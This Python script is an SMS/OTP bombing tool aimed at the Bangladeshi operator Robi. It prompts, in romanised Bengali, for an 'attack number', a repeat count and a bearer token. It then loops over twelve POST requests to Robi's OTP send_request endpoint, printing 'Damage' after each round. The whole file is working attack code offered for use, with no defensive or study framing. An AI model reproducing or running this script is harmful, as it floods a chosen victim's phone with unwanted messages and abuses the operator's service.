import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _ _____                         
 (_)_   _|___                     
 | | | ||_  /                     
 | | | | / /                      
 |_| |_|/___|                     
  ____        ____  _ _   _       
 |  _ \ _   _|  _ \(_) \ | | __ _ 
 | |_) | | | | | | | |  \| |/ _` |
 |  __/| |_| | |_| | | |\  | (_| |
 |_|    \__,_|____/|_|_| \_|\__,_|
                                  """+end)


# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

number  = str(input("[>] apNar aTTack NumBer DiN: "))




amount = int(input("[>] apNar aTTack ar PoriMaN LikHuN: "))


#Get Token

token = str(input("[>] Enter Robi Token: "))


url1 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers1 = CaseInsensitiveDict()
headers1["Content-Type"] = "application/json"

headers1["Authorization"] = "Bearer "+token+""



data1 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8183aaf0-77be-4a77-b9d8-f48767a4265f"}'

url2 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers2 = CaseInsensitiveDict()
headers2["Content-Type"] = "application/json"


headers2["Authorization"] = "Bearer " + token +""


data2 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"b373ffb6-1770-4757-ac63-34da247e3deb"}'



url3 =" https://webapi.robi.com.bd/v1/otp/send_request"

headers3 = CaseInsensitiveDict()

headers3["Content-Type"] = "application/json"

headers3["Authorization"] =  "Bearer "+token+""


data3 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"dd077167-4c05-4173-b9b0-96ecde75c0c1"}'


url4 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers4 = CaseInsensitiveDict()

headers4["Content-Type"] = "application/json"


headers4["Authorization"] = "Bearer "+token+""



data4 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"30c425a5-cd1d-4359-9a9d-6856bafbe6fa"}'


url5 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers5 = CaseInsensitiveDict()

headers5["Content-Type"] = "application/json"


headers5["Authorization"] = "Bearer "+token+""


data5 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"5c5d9662-b432-4e83-9882-077ae14226c6"}'

url6 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers6 = CaseInsensitiveDict()


headers6["Content-Type"] = "application/json"


headers6["Authorization"] = "Bearer "+token+""



data6 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"20b51209-dd23-48e4-b6ad-bb7b1af41021"}'





url7 = "https://webapi.robi.com.bd/v1/otp/send_request"



headers7 = CaseInsensitiveDict()
headers7["Content-Type"] = "application/json"
headers7["Authorization"] =  "Bearer "+token+""


data7 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"a7726093-7f8c-4fc9-b747-bd4e839f4af1"}'

url8 = "https://webapi.robi.com.bd/v1/otp/send_request"






headers8 = CaseInsensitiveDict()

headers8["Content-Type"] = "application/json"


headers8["Authorization"] =  "Bearer "+token+""





data8 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"8d14bb6e-899c-415d-8090-af1a16bce1af"}'



url9 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers9 = CaseInsensitiveDict()


headers9["Content-Type"] = "application/json"

headers9["Authorization"] =  "Bearer "+token+""




data9 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"93f73f0d-2974-43e6-9af8-c8325aa8df3d"}'



url10 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers10 = CaseInsensitiveDict()

headers10["Content-Type"] = "application/json"

headers10["Authorization"] = "Bearer "+token+""




data10 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"b57c2854-8b9d-48d8-abbe-03e0caa28c18"}'





url11 = "https://webapi.robi.com.bd/v1/otp/send_request"

headers11 = CaseInsensitiveDict()


headers11["Content-Type"] = "application/json"


headers11["Authorization"] = "Bearer "+token+""


data11 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"9358cd85-e111-4fe9-8e61-c8fb013348e4"}'




url12 = "https://webapi.robi.com.bd/v1/otp/send_request"


headers12 = CaseInsensitiveDict()


headers12["Content-Type"] = "application/json"

headers12["Authorization"] = "Bearer "+token+""



data12 = '{"phone_number":"'+number+'","lang":"en","type":"internet_package","plan_type":"internet_package","uid":"20b7088f-408a-4c0a-914b-6421a8fa5feb"}'




for i in range(amount):


	resp1 = requests.post(url1, headers=headers1, data=data1)


	resp2 = requests.post(url2, headers=headers2, data=data2)



	resp3 = requests.post(url3, headers=headers3, data=data3)



	resp4 = requests.post(url4, headers=headers4, data=data4)





	resp5 = requests.post(url5, headers=headers5, data=data5)




	resp6 = requests.post(url6, headers=headers6, data=data6)




	resp7 = requests.post(url7, headers=headers7, data=data7)






	resp8 = requests.post(url8, headers=headers8, data=data8)





	resp9 = requests.post(url9, headers=headers9, data=data9)





	resp10 = requests.post(url10, headers=headers10, data=data10)




	resp11 = requests.post(url11, headers=headers11, data=data11)



	resp12 = requests.post(url12, headers=headers12, data=data12)


					
	print(str (i+1)+" Damage \n")